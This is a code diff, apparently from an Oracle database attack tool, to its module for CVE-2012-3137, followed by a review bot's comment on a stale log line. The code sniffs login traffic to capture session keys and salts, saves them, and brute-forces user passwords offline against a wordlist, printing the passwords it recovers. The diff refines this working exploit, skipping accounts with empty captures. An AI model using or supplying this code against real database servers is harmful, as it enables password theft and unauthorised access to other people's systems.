@@ -106,13 +106,13 @@ def customAction(packet):
106106 scapyall .sniff (filter = "tcp and host {0} and port {1}" .format (ip ,port ), count = self .MAX_PACKET_TO_CAPTURE , timeout = self .TIMEOUT , stop_filter = customAction ,store = False )
107107 return sessionKey , salt
108108
109- def __try_to_connect__ (self , args ):
109+ def __try_to_connect__ (self , user ):
110110 '''
111111 Establish a connection to the database
112112 '''
113113 import cx_Oracle
114114 try :
115- connectString = "{0}/{1}@{2}:{3}/{4}" .format (self . args [ ' user' ] , 'aaaaaaa' , self .args ['server' ], self .args ['port' ], self .args ['sid' ])
115+ connectString = "{0}/{1}@{2}:{3}/{4}" .format (user , 'aaaaaaa' , self .args ['server' ], self .args ['port' ], self .args ['sid' ])
116116 logging .debug ("Connecting with {0}" .format (connectString ))
117117 cx_Oracle .connect (connectString )
118118 except Exception , e :
@@ -127,7 +127,7 @@ def getAPassword(self,user):
127127 logging .debug ("Waiting 3 seconds" )
128128 sleep (3 )
129129 logging .debug ("Connection to the database via a new thread with the username {0}" .format (self .args ['user' ]))
130- b = Thread (None , self .__try_to_connect__ , None , (), {'args' : self . args })
130+ b = Thread (None , self .__try_to_connect__ , None , (), {'user' : user })
131131 b .start ()
132132 b .join ()
133133 a .join ()
@@ -185,21 +185,24 @@ def decryptKeys(self, sessionFile, passwdFile):
185185 fsession = open (sessionFile )
186186 for session in fsession :
187187 user , session_hex , salt_hex = session .replace ('\n ' ,'' ).replace ('\t ' ,'' ).split (self .separator )
188- self .args ['print' ].subtitle ("Searching the password of the {0} user" .format (user ))
189- fpasswd = open (passwdFile )
190- pbar ,nb = ProgressBar (widgets = ['' , Percentage (), ' ' , Bar (),' ' , ETA (), ' ' ,'' ], maxval = nbpasswds ).start (), 0
191- for password in fpasswd :
192- nb += 1
193- pbar .update (nb )
194- password = password .replace ('\n ' ,'' ).replace ('\t ' ,'' )
195- session_id = self .__decryptKey__ (session_hex .decode ('hex' ),salt_hex .decode ('hex' ),password )
196- if session_id [40 :] == '\x08 \x08 \x08 \x08 \x08 \x08 \x08 \x08 ' :
197- self .passwdFound .append ([user ,password ])
198- self .args ['print' ].goodNews ("{0} password:{1}" .format (user ,password ))
199- fpasswd .close ()
200- break
201- fpasswd .close ()
202- pbar .finish ()
188+ if session_hex == '[]' or salt_hex == '[]' :
189+ logging .info ("There is not salt or session for '{0}', nothing to do!" .format (user ))
190+ else :
191+ self .args ['print' ].subtitle ("Searching the password of the {0} user" .format (user ))
192+ fpasswd = open (passwdFile )
193+ pbar ,nb = ProgressBar (widgets = ['' , Percentage (), ' ' , Bar (),' ' , ETA (), ' ' ,'' ], maxval = nbpasswds ).start (), 0
194+ for password in fpasswd :
195+ nb += 1
196+ pbar .update (nb )
197+ password = password .replace ('\n ' ,'' ).replace ('\t ' ,'' )
198+ session_id = self .__decryptKey__ (session_hex .decode ('hex' ),salt_hex .decode ('hex' ),password )
199+ if session_id [40 :] == '\x08 \x08 \x08 \x08 \x08 \x08 \x08 \x08 ' :
200+ self .passwdFound .append ([user ,password ])
201+ self .args ['print' ].goodNews ("{0} password:{1}" .format (user ,password ))
202+ fpasswd .close ()
203+ break
204+ fpasswd .close ()
205+ pbar .finish ()
203206 fsession .close ()
204207 return self .passwdFound
205208
@@ -272,7 +275,7 @@ def runCVE20123137Module(args):
272275 cve .getPasswords ()
273276 keys = cve .getKeys ()
274277 if keys != []:
275- args ['print' ].goodNews ("Here are keys:\n \n {0}" .format ('\n ' .join (keys )))
278+ args ['print' ].goodNews ("Here are keys:\n \n {0}\n \n If for some users keys are empty, there was an error during capture or this Oracle user does not exist on the database " .format ('\n ' .join (keys )))
276279 filename = "sessions-{0}-{1}-{2}{3}" .format (args ['server' ],args ['port' ],args ['sid' ],CHALLENGE_EXT_FILE )
277280 f = open (filename ,"w" )
278281 f .write ('\n ' .join (keys ))
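Review bot: The debug message at line 129 of the getAPassword hunk still formats `self.args['user']`, although the thread started on the next line now receives the `user` parameter. If getAPassword is called with an account other than the one in `self.args`, the log will name a different user than the one used in the connection attempt, which makes the capture log unreliable when matching sessions to accounts. The message should use the parameter: `logging.debug("Connection to the database via a new thread with the username {0}".format(user))`. getAPassword starts and ends outside the visible hunk, so other remaining uses of `self.args['user']` in its body cannot be ruled out from here.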